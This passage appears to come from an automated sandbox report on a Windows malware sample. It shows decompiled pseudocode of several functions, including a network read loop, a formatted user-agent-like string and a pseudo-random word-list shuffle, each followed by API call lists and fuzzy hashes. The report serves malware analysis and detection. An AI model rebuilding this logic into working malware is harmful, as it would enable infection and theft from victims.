                                                                                                            							 *0x303d298 = 1; // executed
                                                                                                            						}
                                                                                                            						_t12 = E0303520D(_t27); // executed
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t12 = 8;
                                                                                                            				}
                                                                                                            				return _t12;
                                                                                                            			}














                                                                                                            APIs
                                                                                                            • HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,03031900,?), ref: 03032642
                                                                                                            • GetTickCount.KERNEL32 ref: 03032656
                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,03031900,?), ref: 03032672
                                                                                                            • SwitchToThread.KERNEL32(?,00000001,?,?,?,03031900,?), ref: 03032678
                                                                                                            • _aullrem.NTDLL(?,?,00000013,00000000), ref: 03032695
                                                                                                            • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,03031900,?), ref: 030326B2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                                                                            • String ID:
                                                                                                            • API String ID: 507476733-0
                                                                                                            • Opcode ID: b57a28f1abe1d33ad073a08c7a71202fdb9758f235a2e05cfa94ac0f63bbf5bf
                                                                                                            • Instruction ID: 7302f049b33b261e4f739c1337170f37dea98a70436d5fb922fd180e0f39e0c2
                                                                                                            • Opcode Fuzzy Hash: b57a28f1abe1d33ad073a08c7a71202fdb9758f235a2e05cfa94ac0f63bbf5bf
                                                                                                            • Instruction Fuzzy Hash: 7611A976A873046BE710FB74DC1DFDA77ECEB49351F140925F915DA180EBB4D44086A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 62%
                                                                                                            			E03034F07(void* __eax) {
                                                                                                            				long _v8;
                                                                                                            				char _v12;
                                                                                                            				char _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				void* _v24;
                                                                                                            				void* __esi;
                                                                                                            				void* _t41;
                                                                                                            				char* _t42;
                                                                                                            				long _t43;
                                                                                                            				void* _t46;
                                                                                                            				intOrPtr _t47;
                                                                                                            				intOrPtr* _t48;
                                                                                                            				char _t50;
                                                                                                            				long _t54;
                                                                                                            				char* _t55;
                                                                                                            				long _t56;
                                                                                                            				intOrPtr* _t57;
                                                                                                            				void* _t60;
                                                                                                            				void* _t61;
                                                                                                            				void* _t68;
                                                                                                            				void* _t72;
                                                                                                            				void* _t73;
                                                                                                            				void* _t74;
                                                                                                            				void* _t78;
                                                                                                            
                                                                                                            				_t72 = __eax;
                                                                                                            				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                                                                                            					L2:
                                                                                                            					_t41 = _t72;
                                                                                                            					_pop(_t73);
                                                                                                            					_t74 = _t41;
                                                                                                            					_t42 =  &_v12;
                                                                                                            					_v8 = 0;
                                                                                                            					_v16 = 0;
                                                                                                            					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78); // executed
                                                                                                            					if(_t42 == 0) {
                                                                                                            						_t43 = GetLastError();
                                                                                                            						_v8 = _t43;
                                                                                                            						if(_t43 == 0x2efe) {
                                                                                                            							_v8 = 0;
                                                                                                            							goto L29;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						if(_v12 == 0) {
                                                                                                            							L29:
                                                                                                            							 *((intOrPtr*)(_t74 + 0x30)) = 0;
                                                                                                            						} else {
                                                                                                            							_t46 =  *0x303d130(0, 1,  &_v24); // executed
                                                                                                            							if(_t46 != 0) {
                                                                                                            								_v8 = 8;
                                                                                                            							} else {
                                                                                                            								_t47 = E030375F6(0x1000);
                                                                                                            								_v20 = _t47;
                                                                                                            								if(_t47 == 0) {
                                                                                                            									_v8 = 8;
                                                                                                            								} else {
                                                                                                            									goto L8;
                                                                                                            									do {
                                                                                                            										while(1) {
                                                                                                            											L8:
                                                                                                            											_t50 = _v12;
                                                                                                            											if(_t50 >= 0x1000) {
                                                                                                            												_t50 = 0x1000;
                                                                                                            											}
                                                                                                            											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
                                                                                                            											if(_t50 == 0) {
                                                                                                            												break;
                                                                                                            											}
                                                                                                            											_t57 = _v24;
                                                                                                            											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
                                                                                                            											_t18 =  &_v12;
                                                                                                            											 *_t18 = _v12 - _v16;
                                                                                                            											if( *_t18 != 0) {
                                                                                                            												continue;
                                                                                                            											} else {
                                                                                                            											}
                                                                                                            											L14:
                                                                                                            											if(WaitForSingleObject( *0x303d2a4, 0) != 0x102) {
                                                                                                            												_v8 = 0x102;
                                                                                                            											} else {
                                                                                                            												_t55 =  &_v12;
                                                                                                            												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55); // executed
                                                                                                            												if(_t55 != 0) {
                                                                                                            													goto L19;
                                                                                                            												} else {
                                                                                                            													_t56 = GetLastError();
                                                                                                            													_v8 = _t56;
                                                                                                            													if(_t56 == 0x2f78 && _v12 == 0) {
                                                                                                            														_v8 = 0;
                                                                                                            														goto L19;
                                                                                                            													}
                                                                                                            												}
                                                                                                            											}
                                                                                                            											L22:
                                                                                                            											E03034AAB(_v20);
                                                                                                            											if(_v8 == 0) {
                                                                                                            												_t54 = E03033B3F(_v24, _t74); // executed
                                                                                                            												_v8 = _t54;
                                                                                                            											}
                                                                                                            											goto L25;
                                                                                                            										}
                                                                                                            										_v8 = GetLastError();
                                                                                                            										goto L14;
                                                                                                            										L19:
                                                                                                            									} while (_v12 != 0);
                                                                                                            									goto L22;
                                                                                                            								}
                                                                                                            								L25:
                                                                                                            								_t48 = _v24;
                                                                                                            								 *((intOrPtr*)( *_t48 + 8))(_t48);
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					return _v8;
                                                                                                            				} else {
                                                                                                            					_t60 = E0303121A(__eax); // executed
                                                                                                            					if(_t60 != 0) {
                                                                                                            						return _t60;
                                                                                                            					} else {
                                                                                                            						goto L2;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}




























                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(00000000), ref: 030376AF
                                                                                                            • GetLastError.KERNEL32 ref: 030376CF
                                                                                                              • Part of subcall function 0303121A: wcstombs.NTDLL ref: 030312DC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastObjectSingleWaitwcstombs
                                                                                                            • String ID: @MxtNxt
                                                                                                            • API String ID: 2344289193-1701360479
                                                                                                            • Opcode ID: ddfb09df537277662f2398570d5380e343130e1419474d3445157e8ebf9676d7
                                                                                                            • Instruction ID: 018c9e5b845144009258c7e69ec624c11c4b41662e5dfe59af89a684b9b43f8c
                                                                                                            • Opcode Fuzzy Hash: ddfb09df537277662f2398570d5380e343130e1419474d3445157e8ebf9676d7
                                                                                                            • Instruction Fuzzy Hash: F0411AB5902219EFDF10EFA9D984AEEBBBCFF06745F1448A9E502E7240D7349A40DB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 50%
                                                                                                            			E03039311(void** __esi) {
                                                                                                            				intOrPtr _v0;
                                                                                                            				intOrPtr _t4;
                                                                                                            				intOrPtr _t6;
                                                                                                            				void* _t8;
                                                                                                            				void* _t9;
                                                                                                            				intOrPtr _t10;
                                                                                                            				void* _t11;
                                                                                                            				void** _t13;
                                                                                                            
                                                                                                            				_t13 = __esi;
                                                                                                            				_t4 =  *0x303d364; // 0x53195b0
                                                                                                            				__imp__(_t4 + 0x40);
                                                                                                            				while(1) {
                                                                                                            					_t6 =  *0x303d364; // 0x53195b0
                                                                                                            					_t1 = _t6 + 0x58; // 0x0
                                                                                                            					if( *_t1 == 0) {
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					Sleep(0xa);
                                                                                                            				}
                                                                                                            				_t8 =  *_t13;
                                                                                                            				if(_t8 != 0 && _t8 != 0x303d030) {
                                                                                                            					HeapFree( *0x303d270, 0, _t8);
                                                                                                            				}
                                                                                                            				_t9 = E03035141(_v0, _t13); // executed
                                                                                                            				_t13[1] = _t9;
                                                                                                            				_t10 =  *0x303d364; // 0x53195b0
                                                                                                            				_t11 = _t10 + 0x40;
                                                                                                            				__imp__(_t11);
                                                                                                            				return _t11;
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • RtlEnterCriticalSection.NTDLL(05319570), ref: 0303931A
                                                                                                            • Sleep.KERNEL32(0000000A,?,03035390), ref: 03039324
                                                                                                            • HeapFree.KERNEL32(00000000,00000000,?,03035390), ref: 0303934C
                                                                                                            • RtlLeaveCriticalSection.NTDLL(05319570), ref: 03039368
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                            • String ID: Uxt
                                                                                                            • API String ID: 58946197-1536154274
                                                                                                            • Opcode ID: f9ae0ea73953b2df59e1c27ec2f038f8a0cb6006b5a15faad27aab2cba5a5a45
                                                                                                            • Instruction ID: 9f7cdf8090be0b795759ea34d9b794b011d97bc069dee14be31d436f04eb7b56
                                                                                                            • Opcode Fuzzy Hash: f9ae0ea73953b2df59e1c27ec2f038f8a0cb6006b5a15faad27aab2cba5a5a45
                                                                                                            • Instruction Fuzzy Hash: 5DF0FEB1607380ABE724EF79DD88F567BECBB16740B084414F541D7195C764D850CB1A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 57%
                                                                                                            			E0303520D(signed int __edx) {
                                                                                                            				signed int _v8;
                                                                                                            				long _v12;
                                                                                                            				CHAR* _v16;
                                                                                                            				long _v20;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* _t21;
                                                                                                            				CHAR* _t22;
                                                                                                            				CHAR* _t25;
                                                                                                            				intOrPtr _t26;
                                                                                                            				void* _t27;
                                                                                                            				void* _t31;
                                                                                                            				void* _t32;
                                                                                                            				CHAR* _t36;
                                                                                                            				CHAR* _t42;
                                                                                                            				CHAR* _t43;
                                                                                                            				CHAR* _t44;
                                                                                                            				void* _t49;
                                                                                                            				void* _t51;
                                                                                                            				CHAR* _t54;
                                                                                                            				signed char _t56;
                                                                                                            				intOrPtr _t58;
                                                                                                            				signed int _t59;
                                                                                                            				void* _t62;
                                                                                                            				CHAR* _t65;
                                                                                                            				CHAR* _t66;
                                                                                                            				char* _t67;
                                                                                                            				void* _t68;
                                                                                                            
                                                                                                            				_t61 = __edx;
                                                                                                            				_v20 = 0;
                                                                                                            				_v8 = 0;
                                                                                                            				_v12 = 0;
                                                                                                            				_t21 = E0303154A();
                                                                                                            				if(_t21 != 0) {
                                                                                                            					_t59 =  *0x303d294; // 0x4000000a
                                                                                                            					_t55 = (_t59 & 0xf0000000) + _t21;
                                                                                                            					 *0x303d294 = (_t59 & 0xf0000000) + _t21;
                                                                                                            				}
                                                                                                            				_t22 =  *0x303d12c(0, 2); // executed
                                                                                                            				_v16 = _t22;
                                                                                                            				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                                                                            					_t25 = E030321DE( &_v8,  &_v20); // executed
                                                                                                            					_t54 = _t25;
                                                                                                            					_t26 =  *0x303d2e0; // 0x22da5a8
                                                                                                            					if( *0x303d294 > 5) {
                                                                                                            						_t8 = _t26 + 0x303e5cd; // 0x4d283a53
                                                                                                            						_t27 = _t8;
                                                                                                            					} else {
                                                                                                            						_t7 = _t26 + 0x303e9f9; // 0x44283a44
                                                                                                            						_t27 = _t7;
                                                                                                            					}
                                                                                                            					E030311F4(_t27, _t27);
                                                                                                            					_t31 = E03033598(_t61,  &_v20,  &_v12); // executed
                                                                                                            					if(_t31 == 0) {
                                                                                                            						CloseHandle(_v20);
                                                                                                            					}
                                                                                                            					_t62 = 5;
                                                                                                            					if(_t54 != _t62) {
                                                                                                            						 *0x303d2a8 =  *0x303d2a8 ^ 0x81bbe65d;
                                                                                                            						_t32 = E030375F6(0x60);
                                                                                                            						 *0x303d364 = _t32;
                                                                                                            						__eflags = _t32;
                                                                                                            						if(_t32 == 0) {
                                                                                                            							_push(8);
                                                                                                            							_pop(0);
                                                                                                            						} else {
                                                                                                            							memset(_t32, 0, 0x60);
                                                                                                            							_t49 =  *0x303d364; // 0x53195b0
                                                                                                            							_t68 = _t68 + 0xc;
                                                                                                            							__imp__(_t49 + 0x40);
                                                                                                            							_t51 =  *0x303d364; // 0x53195b0
                                                                                                            							 *_t51 = 0x303e823;
                                                                                                            						}
                                                                                                            						_t54 = 0;
                                                                                                            						__eflags = 0;
                                                                                                            						if(0 == 0) {
                                                                                                            							_t36 = RtlAllocateHeap( *0x303d270, 0, 0x43);
                                                                                                            							 *0x303d300 = _t36;
                                                                                                            							__eflags = _t36;
                                                                                                            							if(_t36 == 0) {
                                                                                                            								_push(8);
                                                                                                            								_pop(0);
                                                                                                            							} else {
                                                                                                            								_t56 =  *0x303d294; // 0x4000000a
                                                                                                            								_t61 = _t56 & 0x000000ff;
                                                                                                            								_t58 =  *0x303d2e0; // 0x22da5a8
                                                                                                            								_t13 = _t58 + 0x303e55a; // 0x697a6f4d
                                                                                                            								_t55 = _t13;
                                                                                                            								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x303c2a7);
                                                                                                            							}
                                                                                                            							_t54 = 0;
                                                                                                            							__eflags = 0;
                                                                                                            							if(0 == 0) {
                                                                                                            								asm("sbb eax, eax");
                                                                                                            								E0303A82B( ~_v8 &  *0x303d2a8, 0x303d00c); // executed
                                                                                                            								_t42 = E03034C40(_t55); // executed
                                                                                                            								_t54 = _t42;
                                                                                                            								__eflags = _t54;
                                                                                                            								if(_t54 != 0) {
                                                                                                            									goto L30;
                                                                                                            								}
                                                                                                            								_t43 = E030374A5(); // executed
                                                                                                            								__eflags = _t43;
                                                                                                            								if(_t43 != 0) {
                                                                                                            									__eflags = _v8;
                                                                                                            									_t65 = _v12;
                                                                                                            									if(_v8 != 0) {
                                                                                                            										L29:
                                                                                                            										_t44 = E03035461(_t61, _t65, _v8); // executed
                                                                                                            										_t54 = _t44;
                                                                                                            										goto L30;
                                                                                                            									}
                                                                                                            									__eflags = _t65;
                                                                                                            									if(__eflags == 0) {
                                                                                                            										goto L30;
                                                                                                            									}
                                                                                                            									_t54 = E03033FC2(__eflags,  &(_t65[4]));
                                                                                                            									__eflags = _t54;
                                                                                                            									if(_t54 == 0) {
                                                                                                            										goto L30;
                                                                                                            									}
                                                                                                            									goto L29;
                                                                                                            								}
                                                                                                            								_t54 = 8;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_t66 = _v12;
                                                                                                            						if(_t66 == 0) {
                                                                                                            							L30:
                                                                                                            							if(_v16 == 0 || _v16 == 1) {
                                                                                                            								 *0x303d128();
                                                                                                            							}
                                                                                                            							goto L34;
                                                                                                            						}
                                                                                                            						_t67 =  &(_t66[4]);
                                                                                                            						do {
                                                                                                            						} while (E03035AB2(_t62, _t67, 0, 1) == 0x4c7);
                                                                                                            					}
                                                                                                            					goto L30;
                                                                                                            				} else {
                                                                                                            					_t54 = _t22;
                                                                                                            					L34:
                                                                                                            					return _t54;
                                                                                                            				}
                                                                                                            			}
































                                                                                                            APIs
                                                                                                              • Part of subcall function 0303154A: GetModuleHandleA.KERNEL32(4C44544E,00000000,03035226,00000000,00000000), ref: 03031559
                                                                                                            • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 030352A3
                                                                                                              • Part of subcall function 030375F6: RtlAllocateHeap.NTDLL(00000000,00000000,03034F70), ref: 03037602
                                                                                                            • memset.NTDLL ref: 030352F2
                                                                                                            • RtlInitializeCriticalSection.NTDLL(05319570), ref: 03035303
                                                                                                              • Part of subcall function 03033FC2: memset.NTDLL ref: 03033FD7
                                                                                                              • Part of subcall function 03033FC2: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 03034019
                                                                                                              • Part of subcall function 03033FC2: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 03034024
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 0303532E
                                                                                                            • wsprintfA.USER32 ref: 0303535E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 4246211962-0
                                                                                                            • Opcode ID: fcd9f34fa1c424d953c120d5eae1ccaa6e1a84691007b211dfc9cb51ae2ccc4d
                                                                                                            • Instruction ID: 5d50e1f08d81bd90278f4dc879eacf9fb60a29418bb887cb99c3c4d201fda1c0
                                                                                                            • Opcode Fuzzy Hash: fcd9f34fa1c424d953c120d5eae1ccaa6e1a84691007b211dfc9cb51ae2ccc4d
                                                                                                            • Instruction Fuzzy Hash: E251F471A47314ABDB50EBB4DC94BAEB3FCAB07700F080865E501EB164E7B4D9448B99
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 22%
                                                                                                            			E030378E6(signed int __eax, signed int _a4, signed int _a8) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				intOrPtr _v16;
                                                                                                            				signed int _v20;
                                                                                                            				intOrPtr _t81;
                                                                                                            				char _t83;
                                                                                                            				signed int _t90;
                                                                                                            				signed int _t97;
                                                                                                            				signed int _t99;
                                                                                                            				char _t101;
                                                                                                            				unsigned int _t102;
                                                                                                            				intOrPtr _t103;
                                                                                                            				char* _t107;
                                                                                                            				signed int _t110;
                                                                                                            				signed int _t113;
                                                                                                            				signed int _t118;
                                                                                                            				signed int _t122;
                                                                                                            				intOrPtr _t124;
                                                                                                            
                                                                                                            				_t102 = _a8;
                                                                                                            				_t118 = 0;
                                                                                                            				_v20 = __eax;
                                                                                                            				_t122 = (_t102 >> 2) + 1;
                                                                                                            				_v8 = 0;
                                                                                                            				_a8 = 0;
                                                                                                            				_t81 = E030375F6(_t122 << 2);
                                                                                                            				_v16 = _t81;
                                                                                                            				if(_t81 == 0) {
                                                                                                            					_push(8);
                                                                                                            					_pop(0);
                                                                                                            					L37:
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            				_t107 = _a4;
                                                                                                            				_a4 = _t102;
                                                                                                            				_t113 = 0;
                                                                                                            				while(1) {
                                                                                                            					_t83 =  *_t107;
                                                                                                            					if(_t83 == 0) {
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					if(_t83 == 0xd || _t83 == 0xa) {
                                                                                                            						if(_t118 != 0) {
                                                                                                            							if(_t118 > _v8) {
                                                                                                            								_v8 = _t118;
                                                                                                            							}
                                                                                                            							_a8 = _a8 + 1;
                                                                                                            							_t118 = 0;
                                                                                                            						}
                                                                                                            						 *_t107 = 0;
                                                                                                            						goto L16;
                                                                                                            					} else {
                                                                                                            						if(_t118 != 0) {
                                                                                                            							L10:
                                                                                                            							_t118 = _t118 + 1;
                                                                                                            							L16:
                                                                                                            							_t107 = _t107 + 1;
                                                                                                            							_t15 =  &_a4;
                                                                                                            							 *_t15 = _a4 - 1;
                                                                                                            							if( *_t15 != 0) {
                                                                                                            								continue;
                                                                                                            							}
                                                                                                            							break;
                                                                                                            						}
                                                                                                            						if(_t113 == _t122) {
                                                                                                            							L21:
                                                                                                            							if(_a8 <= 0x20) {
                                                                                                            								_push(0xb);
                                                                                                            								L34:
                                                                                                            								_pop(0);
                                                                                                            								L35:
                                                                                                            								E03034AAB(_v16);
                                                                                                            								goto L37;
                                                                                                            							}
                                                                                                            							_t24 = _v8 + 5; // 0xcdd8d2f8
                                                                                                            							_t103 = E030375F6((_v8 + _t24) * _a8 + 4);
                                                                                                            							if(_t103 == 0) {
                                                                                                            								_push(8);
                                                                                                            								goto L34;
                                                                                                            							}
                                                                                                            							_t90 = _a8;
                                                                                                            							_a4 = _a4 & 0x00000000;
                                                                                                            							_v8 = _v8 & 0x00000000;
                                                                                                            							_t124 = _t103 + _t90 * 4;
                                                                                                            							if(_t90 <= 0) {
                                                                                                            								L31:
                                                                                                            								 *0x303d2b0 = _t103;
                                                                                                            								goto L35;
                                                                                                            							}
                                                                                                            							do {
                                                                                                            								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                                                                                            								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                                                                                            								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                                                                                            								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                                                                                            								_v12 = _v12 & 0x00000000;
                                                                                                            								if(_a4 <= 0) {
                                                                                                            									goto L30;
                                                                                                            								} else {
                                                                                                            									goto L26;
                                                                                                            								}
                                                                                                            								while(1) {
                                                                                                            									L26:
                                                                                                            									_t99 = _v12;
                                                                                                            									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                                                                                                            									if(_t99 == 0) {
                                                                                                            										break;
                                                                                                            									}
                                                                                                            									_v12 = _v12 + 1;
                                                                                                            									if(_v12 < _a4) {
                                                                                                            										continue;
                                                                                                            									}
                                                                                                            									goto L30;
                                                                                                            								}
                                                                                                            								_v8 = _v8 - 1;
                                                                                                            								L30:
                                                                                                            								_t97 = _a4;
                                                                                                            								_a4 = _a4 + 1;
                                                                                                            								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                                                                                            								__imp__(_t124);
                                                                                                            								_v8 = _v8 + 1;
                                                                                                            								_t124 = _t124 + _t97 + 1;
                                                                                                            							} while (_v8 < _a8);
                                                                                                            							goto L31;
                                                                                                            						}
                                                                                                            						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                                                                                            						_t101 = _t83;
                                                                                                            						if(_t83 - 0x61 <= 0x19) {
                                                                                                            							_t101 = _t101 - 0x20;
                                                                                                            						}
                                                                                                            						 *_t107 = _t101;
                                                                                                            						_t113 = _t113 + 1;
                                                                                                            						goto L10;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				if(_t118 != 0) {
                                                                                                            					if(_t118 > _v8) {
                                                                                                            						_v8 = _t118;
                                                                                                            					}
                                                                                                            					_a8 = _a8 + 1;
                                                                                                            				}
                                                                                                            				goto L21;
                                                                                                            			}

                                                                                                            APIs
                                                                                                              • Part of subcall function 030375F6: RtlAllocateHeap.NTDLL(00000000,00000000,03034F70), ref: 03037602
                                                                                                            • lstrcpy.KERNEL32(69B25F45,00000020), ref: 030379E3
                                                                                                            • lstrcat.KERNEL32(69B25F45,00000020), ref: 030379F8
                                                                                                            • lstrcmp.KERNEL32(00000000,69B25F45), ref: 03037A0F
                                                                                                            • lstrlen.KERNEL32(69B25F45), ref: 03037A33
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3214092121-3916222277
                                                                                                            • Opcode ID: cc519957bddcdfd3d8ec3f90d059c404b727c10cc140d9852b305fd0109249e5
                                                                                                            • Instruction ID: 71100dfbbd3aad381261d036787e91a8f52f6bd1d20651b2be0568355f1b98af
                                                                                                            • Opcode Fuzzy Hash: cc519957bddcdfd3d8ec3f90d059c404b727c10cc140d9852b305fd0109249e5
                                                                                                            • Instruction Fuzzy Hash: 5351A0B1A02218EBDF11DF99C5847ADFBFEEF86B14F09815AE855AB201C7719B41CB40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 18%
                                                                                                            			E0303121A(void* __esi) {
                                                                                                            				signed int _v8;
                                                                                                            				long _v12;
                                                                                                            				char _v16;
                                                                                                            				long* _v20;
                                                                                                            				long _t36;
                                                                                                            				long* _t47;
                                                                                                            				intOrPtr* _t63;
                                                                                                            				intOrPtr* _t64;
                                                                                                            				char* _t65;
                                                                                                            
                                                                                                            				_t36 =  *((intOrPtr*)(__esi + 0x28));
                                                                                                            				_t63 = __esi + 0x2c;
                                                                                                            				_v16 = 0;
                                                                                                            				 *_t63 = 0;
                                                                                                            				_v12 = _t36;
                                                                                                            				if(_t36 != 0) {
                                                                                                            					L12:
                                                                                                            					return _v12;
                                                                                                            				}
                                                                                                            				_v8 = 4;
                                                                                                            				__imp__( *((intOrPtr*)(__esi + 0x18)), 0); // executed
                                                                                                            				if(_t36 == 0) {
                                                                                                            					L11:
                                                                                                            					_v12 = GetLastError();
                                                                                                            					goto L12;
                                                                                                            				}
                                                                                                            				_push( &_v16);
                                                                                                            				_push( &_v8);
                                                                                                            				_push(_t63);
                                                                                                            				_t64 = __imp__; // 0x6ee0fd20
                                                                                                            				_push(0);
                                                                                                            				_push(0x20000013);
                                                                                                            				_push( *((intOrPtr*)(__esi + 0x18)));
                                                                                                            				if( *_t64() == 0) {
                                                                                                            					goto L11;
                                                                                                            				} else {
                                                                                                            					_v16 = 0;
                                                                                                            					_v8 = 0;
                                                                                                            					 *_t64( *((intOrPtr*)(__esi + 0x18)), 0x16, 0, 0,  &_v8,  &_v16);
                                                                                                            					_t47 = E030375F6(_v8 + 2);
                                                                                                            					_v20 = _t47;
                                                                                                            					if(_t47 == 0) {
                                                                                                            						_v12 = 8;
                                                                                                            					} else {
                                                                                                            						_push( &_v16);
                                                                                                            						_push( &_v8);
                                                                                                            						_push(_t47);
                                                                                                            						_push(0);
                                                                                                            						_push(0x16);
                                                                                                            						_push( *((intOrPtr*)(__esi + 0x18)));
                                                                                                            						if( *_t64() == 0) {
                                                                                                            							_v12 = GetLastError();
                                                                                                            						} else {
                                                                                                            							_v8 = _v8 >> 1;
                                                                                                            							 *((short*)(_v20 + _v8 * 2)) = 0;
                                                                                                            							_t65 = E030375F6(_v8 + 1);
                                                                                                            							if(_t65 == 0) {
                                                                                                            								_v12 = 8;
                                                                                                            							} else {
                                                                                                            								wcstombs(_t65, _v20, _v8 + 1);
                                                                                                            								 *(__esi + 0xc) = _t65;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						E03034AAB(_v20);
                                                                                                            					}
                                                                                                            					goto L12;
                                                                                                            				}
                                                                                                            			}













                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32 ref: 0303130E
                                                                                                              • Part of subcall function 030375F6: RtlAllocateHeap.NTDLL(00000000,00000000,03034F70), ref: 03037602
                                                                                                            • wcstombs.NTDLL ref: 030312DC
                                                                                                            • GetLastError.KERNEL32 ref: 030312F2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$AllocateHeapwcstombs
                                                                                                            • String ID: @MxtNxt
                                                                                                            • API String ID: 2631933831-1701360479
                                                                                                            • Opcode ID: 84e0de005c89fb0f0dff290d292710fa7ee8224fbd704a9e99a7fd5bcb13939c
